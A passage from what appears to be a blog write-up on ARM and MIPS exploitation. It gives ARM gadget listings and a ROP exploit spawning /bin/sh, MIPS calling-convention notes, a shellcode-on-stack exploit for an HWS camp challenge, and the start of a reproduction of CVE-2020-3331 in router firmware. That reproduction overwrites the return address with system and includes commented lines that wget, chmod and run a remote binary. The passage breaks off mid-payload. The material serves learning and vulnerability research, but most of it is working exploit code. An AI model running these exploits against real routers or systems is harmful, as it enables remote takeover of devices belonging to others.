class="hljs-number">0x20</span>; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x00021538</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x19598</span>; mov r0, r3; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x0002165c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x19674</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x000220c0</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x1a0d8</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00024210</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x1c254</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x0003147c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x294b0</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00047a54</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x3fa88</span>; mov r0, r3; pop {r3, r4, r7, pc}; <br><span class="hljs-number">0x00048354</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x4036c</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x0004839c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x403b4</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00048454</span>: svc #<span class="hljs-number">0</span>; cmn r0, 
#<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x4046c</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x0004858c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x405a4</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x0005e200</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x56218</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00014054</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0xc06c</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00014a5c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0xca74</span>; mov r0, r3; pop {r3, r4, r7, pc}; <br><span class="hljs-number">0x00024014</span>: svc #<span class="hljs-number">0</span>; ldr r7, [r6, #<span class="hljs-number">-0x43c</span>]; and r3, r7, #<span class="hljs-number">0xc</span>; cmp r3, #<span class="hljs-number">4</span>; beq #<span class="hljs-number">0x1c000</span>; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x0003226c</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; pop {r3, r4, r5, r6, r7, pc}; <br><span class="hljs-number">0x0001edf0</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; pop {r3, r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x00030bd8</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; sub sp, fp, #<span class="hljs-number">0x20</span>; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x0000ddc0</span>: svc #<span 
class="hljs-number">0</span>; mov r0, r6; add sp, sp, #<span class="hljs-number">0xc</span>; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x0003b4bc</span>: svc #<span class="hljs-number">0</span>; mov r0, r6; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x00039f60</span>: svc #<span class="hljs-number">0</span>; mov r0, r8; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x0000fed0</span>: svc #<span class="hljs-number">0</span>; pop {r3, r4, r5, r6, r7, pc}; <br><span class="hljs-number">0x00016368</span>: svc #<span class="hljs-number">0</span>; pop {r4, r5, r6, r7, pc}; <br><span class="hljs-number">0x0001aca8</span>: svc #<span class="hljs-number">0</span>; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x00019568</span>: svc #<span class="hljs-number">0</span>; pop {r4, r5, r6, r7, r8, sb, pc}; <br><span class="hljs-number">0x000482fc</span>: svc #<span class="hljs-number">0</span>; pop {r7}; bx lr; <br><span class="hljs-number">0x000505c0</span>: svc #<span class="hljs-number">0</span>; sub sp, fp, #<span class="hljs-number">0x20</span>; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x00008150</span>: svceq #<span class="hljs-number">0x89832c</span>; orrvs sp, lr, #<span class="hljs-number">140</span>, #<span class="hljs-number">6</span>; push {r3, lr}; bl #<span class="hljs-number">0xbd4</span>; pop {r3, pc}; <br></code></pre></td></tr></table></figure><p>至此所需要的gadget全部找到,就可以直接写rop了</p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br><span class="hljs-comment">#banary = "./pwn"</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span 
class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process([<span class="hljs-string">"qemu-arm-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/arm-linux-gnueabi"</span>,<span class="hljs-string">"./typo"</span>])<br><span class="hljs-keyword">else</span>:<br> io = process([<span class="hljs-string">"qemu-arm-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/arm-linux-gnueabi"</span>,<span class="hljs-string">"-g"</span>,<span class="hljs-string">"1234"</span>,<span class="hljs-string">"./typo"</span>])<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'arm'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>ru(<span class="hljs-string">"Input ~ if you want to quit"</span>)<br>s(b<span class="hljs-string">'\n'</span>)<br><br>sleep(0.5)<br>io.recv()<br><span 
class="hljs-comment">#payload=asm(shellcraft.sh()).ljust(112,b'A')+p32(0xfffeef44)#shellcode</span><br><span class="hljs-attribute">pop_r0_r4_pc</span>=0x00020904<br><span class="hljs-attribute">bin_sh</span>=0x006C384<br><span class="hljs-attribute">svc_0</span>=0x00023b78<br><span class="hljs-attribute">pop_r7_pc</span>=0x00014068<br><span class="hljs-attribute">pop_r1_pc</span>=0x00068bec<br><span class="hljs-attribute">mov_r2_r4_blx_r3</span>=0x0003338c<br><span class="hljs-attribute">pop_r3_pc</span>=0x00008160<br><br><span class="hljs-attribute">payload</span>=b'A'*112+p32(pop_r7_pc)+p32(0xb)+p32(pop_r1_pc)+p32(0)+p32(pop_r0_r4_pc)+p32(bin_sh)+p32(0)+p32(pop_r3_pc)+p32(svc_0)+p32(mov_r2_r4_blx_r3)<br><span class="hljs-comment">#pause()</span><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="mips架构"><a href="#mips架构" class="headerlink" title="MIPS architecture"></a>MIPS architecture</h1><h2 id="基础知识-1"><a href="#基础知识-1" class="headerlink" title="Basics"></a>Basics</h2><h3 id="MIPS-重要特性"><a href="#MIPS-重要特性" class="headerlink" title="Important MIPS properties"></a>Important MIPS properties</h3><ul><li>MIPS itself does not support NX, so shellcode placed on the stack can be executed directly; the example below relies on exactly that.</li></ul><h3 id="MIPS-函数调用约定"><a href="#MIPS-函数调用约定" class="headerlink" title="MIPS calling convention"></a>MIPS calling convention</h3><ul><li>The caller places arguments in registers $a0 - $a3, which hold at most four arguments. Further arguments, and structures passed by value, are placed on the stack.</li><li>The caller uses <code>jal</code> with the subroutine's label. The return address is saved in $ra.</li><li>Because <code>jal</code> has a delay slot, the saved return address is PC + 8, where PC is the address of the <code>jal</code> itself: the instruction after the delay slot.</li><li>If the callee uses a frame pointer, it usually sets it to the stack pointer. The old frame pointer must be saved on the stack first.</li><li>The callee normally saves the registers it will use on the stack at function entry. If it calls other subroutines it must save $ra, and it must also save any temporary or preserved registers it needs to keep across the call.</li><li>When the subroutine finishes, the return value goes in $v0 - $v1.</li><li>The callee returns to the caller with <code>jr $ra</code>.</li></ul><p>Ref: <a href="https://www.jianshu.com/p/79895392ecb2">https://www.jianshu.com/p/79895392ecb2</a></p><h3 id="MIPS-寄存器"><a href="#MIPS-寄存器" class="headerlink" title="MIPS registers"></a>MIPS registers</h3><table><thead><tr><th>Register</th><th>Alias</th><th>Purpose</th></tr></thead><tbody><tr><td>$0</td><td>$zero</td><td>constant value 0</td></tr><tr><td>$1</td><td>$at</td><td>reserved for the assembler</td></tr><tr><td>$2-$3</td><td>$v0-$v1</td><td>function return values (results and expression evaluation)</td></tr><tr><td>$4-$7</td><td>$a0-$a3</td><td>function arguments</td></tr><tr><td>$8-$15</td><td>$t0-$t7</td><td>temporaries (caller-saved, free to clobber)</td></tr><tr><td>$16-$23</td><td>$s0-$s7</td><td>saved registers (callee must save/restore them if it uses them)</td></tr><tr><td>$24-$25</td><td>$t8-$t9</td><td>temporaries (caller-saved, free to clobber)</td></tr><tr><td>$28</td><td>$gp</td><td>global pointer</td></tr><tr><td>$29</td><td>$sp</td><td>stack pointer</td></tr><tr><td>$30</td><td>$fp/$s8</td><td>frame pointer</td></tr><tr><td>$31</td><td>$ra</td><td>return address</td></tr></tbody></table><p>Basics: <a href="https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#mips">https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#mips</a></p><h2 id="前期准备"><a href="#前期准备" class="headerlink" title="Preparation"></a>Preparation</h2><p>The mipsrop plugin for IDA: <a href="https://github.com/tacnetsol/ida">https://github.com/tacnetsol/ida</a></p><p>Neither ropper nor ROPgadget seems very good at finding MIPS gadgets?</p><h2 id="例题"><a href="#例题" class="headerlink" title="Examples"></a>Examples</h2><h3 id="HWS夏令营结营赛题-pwn"><a href="#HWS夏令营结营赛题-pwn" class="headerlink" title="HWS summer camp final challenge: pwn"></a>HWS summer camp final challenge: <a href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_pwn_1/pwn">pwn</a></h3><p>Run:</p><figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript">qemu-mips-static ./pwn<br></code></pre></td></tr></table></figure><p>Debug (qemu waits for a gdb connection on port 1234):</p><figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript">qemu-mips-static -g 1234 ./pwn<br></code></pre></td></tr></table></figure><p>Protections:</p><p><img 
src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161756671.png" alt="image-20240316175622583"></p><p>Looking at the challenge code, there is an obvious stack overflow caused by a <code>memcpy</code>:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161757594.png" alt="image-20240316175735552"></p><p>The input format is somewhat constrained, and the offset cannot be obtained directly by debugging: execution gets stuck at the place shown below, and I do not know the exact reason.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161800428.png" alt="image-20240316180028333"></p><p>The only way is to find the address of our input and the address of the stack slot whose value finally ends up in $ra, and compute the offset from the two.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161803215.png" alt="image-20240316180341152"></p><p>Once the offset is known, the next step is to use mipsrop to find the gadgets we need.</p><p>The idea is roughly: find a gadget that puts a stack address into a register, then find a matching gadget that does <code>jalr</code> or <code>jr</code> through that register, so that execution lands on the shellcode.</p><figure class="highlight gherkin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs gherkin">Python>mipsrop.stackfinder()<br>----------------------------------------------------------------------------------------------------------------<br>| Address | Action | Control Jump |<br>----------------------------------------------------------------------------------------------------------------<br>| 0x004273C4 | addiu $a2,$sp,0x70+var_C | jalr $s0 |<br>| 0x0042BCD0 | addiu $a2,$sp,0x88+var_C | jalr $s2 |<br>| 0x0042FA00 | addiu $v1,$sp,0x138+var_104 | jalr $s1 |<br>| 0x004491F8 | addiu $a2,$sp,0x44+var_C | jalr $s1 |<br>| 0x0044931C | addiu $v0,$sp,0x30+var_8 | jalr $s1 |<br>| 0x00449444 | addiu $a2,$sp,0x44+var_C | jalr $s1 |<br>| 0x0044AD58 | addiu $a1,$sp,0x60+var_28 | jalr $s4 |<br>| 0x0044AEFC | addiu $a1,$sp,0x64+var_28 | jalr $s5 |<br>| 0x0044B154 | addiu $a1,$sp,0x6C+var_38 | jalr $s2 |<br>| 0x0044B1EC | addiu $v0,$sp,0x6C+var_40 | jalr $s2 |<br>| 0x0044B3EC | addiu $v0,$sp,0x170+var_130 | jalr $s0 |<br>| 0x00454E94 | addiu $s7,$sp,0xB8+var_98 | jalr $s3 |<br>| 0x00465BEC | addiu $a1,$sp,0xC4+var_98 | jalr $s0 |<br>----------------------------------------------------------------------------------------------------------------<br></code></pre></td></tr></table></figure><p>First take the gadget at 0x004273C4, which puts a stack address into $a2, then look for a gadget that does <code>jalr</code> or <code>jr</code> through $a2:</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">Python>mipsrop.find("jr")<br>----------------------------------------------------------------------------------------------------------------<br>| Address | Action | Control Jump |<br>----------------------------------------------------------------------------------------------------------------<br>| 0x004002FC | jr $ra | jr 0x1C+var_s0($sp) |<br>| 0x0041F518 | jr $t9 | jr $s1 |<br>| 0x0041F538 | jr $t9 | jr $s1 |<br>| 0x00421684 | jr $t9 | jr $a2 |<br><br>.text:00421684 00 C0 C8 25 move $t9, $a2<br>.text:00421688 03 20 00 08 jr $t9<br></code></pre></td></tr></table></figure><p>Clearly the gadget at 0x00421684 is the one to use.</p><p>What remains is to arrange for gadget 1 to run and then hand control to gadget 2. Look at the two gadgets side by side:</p><figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arcade">0x004273C4 | addiu $a2,$sp,0x70+var_C | jalr $s0 <br>0x00421684 | jr $t9 | jr $a2 <br><br></code></pre></td></tr></table></figure><p>The first gadget ends with <code>jalr $s0</code>, and the epilogue of the vulnerable function happens to restore $s0 from the stack, so the overflow controls it as well: the saved $s0 slot receives the address of gadget 2 and the saved $ra slot receives the address of gadget 1.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161809594.png" alt="image-20240316180902557"></p><p>Debugging puts the offset to the saved $s0 at 0x6c, with the saved $ra 0x24 bytes above it (the 4-byte $s0 slot followed by 0x20 bytes of padding, as in the payload below). After the function returns, gadget 1 computes $a2 = $sp + 0x64, so writing the shellcode at that position, right after the padding that follows the return address, gets a shell.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 
class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><span class="hljs-comment">#banary = "./pwn"</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process([<span class="hljs-string">"qemu-mips-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/mipsel-linux-gnu/"</span>,<span class="hljs-string">"./pwn"</span>])<br><span class="hljs-keyword">else</span>:<br> io = process([<span class="hljs-string">"qemu-mips-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/mipsel-linux-gnu/"</span>,<span class="hljs-string">"-g"</span>,<span class="hljs-string">"1234"</span>,<span class="hljs-string">"./pwn"</span>])<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'mips'</span>,endian=<span class="hljs-string">"big"</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : 
io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>ru(<span class="hljs-string">"Enter the group number:"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">1</span>))<br><br>jr_a2=<span class="hljs-number">0x0421684</span><br>addiu_a2=<span class="hljs-number">0x4273c4</span> <span class="hljs-comment">#addiu $a2,$sp,0x70+var_C jalr $s0</span><br><br>ru(<span class="hljs-string">"'1:Job.'"</span>)<br>payload=<span 
class="hljs-string">b'1:'</span><br>payload += <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x6c</span> + p32(jr_a2) + <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x20</span> + p32(addiu_a2)<br>payload += <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x64</span> + asm(shellcraft.sh())<br><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h3 id="CVE-2020-3331复现"><a href="#CVE-2020-3331复现" class="headerlink" title="Reproducing CVE-2020-3331"></a>Reproducing CVE-2020-3331</h3><p>Reference: <a href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_iot_cc/pwn.md">https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_iot_cc/pwn.md</a></p><p>The link above has the firmware download and a reproduction environment, but I do not recommend its Docker environment: it is old enough to cause many problems, and it is easier to set up the environment yourself with qemu.</p><p>The vulnerability is in the <code>guest_logout_cgi</code> function, in the way <code>sscanf</code> handles the <code>submit_button</code> parameter.</p><p><strong>sscanf</strong> is very similar to the familiar <strong>scanf</strong>; the difference is that <strong>sscanf</strong> takes the string to parse as its first argument, while <strong>scanf</strong> reads from standard input. To see what <strong>sscanf</strong> does, first consider an example:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c">#include <stdio.h><br>#include <stdlib.h><br><br>int main(void) {<br>    int a, b, c;<br>    char string[15] = "1 2 3";<br>    sscanf(string, "%d %d %d", &a, &b, &c);<br>    printf("%d %d %d\n", a, b, c);<br>    return 0;<br>}<br></code></pre></td></tr></table></figure><p>Here <strong>sscanf</strong> uses the format string <strong>"%d %d %d"</strong> to assign the 1, 2 and 3 in <strong>string</strong> to the variables <strong>a</strong>, <strong>b</strong> and <strong>c</strong>.</p><p>In the CGI, <strong>sscanf</strong> uses the format string <strong>"%[^;];%*[^=]=%[^\n]"</strong> to split <strong>v11</strong> into pieces: <strong>sub_string1</strong> is a string containing no <strong>';'</strong> (matching <strong>%[^;]</strong>) and is stored into <strong>v29</strong>; <strong>sub_string2</strong> is a string containing no <strong>'='</strong> (matching <strong>%*[^=]</strong>, where the <strong>*</strong> discards the value) and is thrown away; <strong>sub_string3</strong> is a string containing no <strong>'\n'</strong> (matching <strong>%[^\n]</strong>) and is stored into <strong>v28</strong>. For example, if <strong>v11 = "AAAA;var=BBBB\n"</strong>, then <strong>v29 = "AAAA"</strong> and <strong>v28 = "BBBB"</strong>. None of the conversions carries a field width, so <strong>%[^;]</strong> copies as many bytes as the request supplies into the fixed-size stack buffer <strong>v29</strong>; a <strong>submit_button</strong> value with no <strong>';'</strong> in it is therefore copied in its entirety, and that is the overflow.</p><p>Triggering the vulnerability requires three conditions:</p><ol><li><strong>v5</strong> != NULL && <strong>v10</strong> != NULL</li><li><strong>v5</strong> is a valid MAC address && <strong>v10</strong> is a valid IPv4 address</li><li><strong>v11</strong> contains the substring <strong>"status_guestnet.asp"</strong></li></ol><p>where</p><p>v5 = get_cgi("cmac");</p><p>v10 = get_cgi("cip");</p><p>v11 = get_cgi("submit_button");</p><p>Then the payload can be built. Conveniently, in this firmware $a0 still holds the first argument of the earlier <code>sscanf</code> call when the function returns, i.e. our input string, so when the overflow overwrites the return address with the address of <code>system</code>, the first argument <code>system</code> receives is exactly the <code>submit_button</code> value we sent. That is why the command in the exp starts with a newline: the shell treats the leading <code>status_guestnet.asp</code> as a separate line (a command that fails harmlessly) and then runs the real command on the next line.</p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-comment">#!/usr/bin/python3</span><br><br><span class="hljs-keyword">from</span> pwn import *<br>import requests<br><span class="hljs-keyword">from</span> threading import Thread<br><br>context(<span class="hljs-attribute">arch</span>=<span class="hljs-string">'mips'</span>, <span class="hljs-attribute">endian</span>=<span class="hljs-string">'little'</span>, <span class="hljs-attribute">os</span>=<span class="hljs-string">'linux'</span>)<br><span class="hljs-built_in"></span><br><span class="hljs-built_in">system </span>= 0x0047A610<br><br>cmd = <span class="hljs-string">'\n'</span><br><span class="hljs-comment">#cmd += 'wget http://192.168.2.1:8000/tools/msf -O /msf\n'</span><br><span class="hljs-comment">#cmd += 'chmod 777 /msf\n'</span><br><span class="hljs-comment">#cmd += '/msf\n'</span><br>cmd += <span class="hljs-string">'echo "pwn_sucess" > /tmp/test.txt\n'</span><br><br>assert(len(cmd) < 0x55)<br><br>payload = b<span 
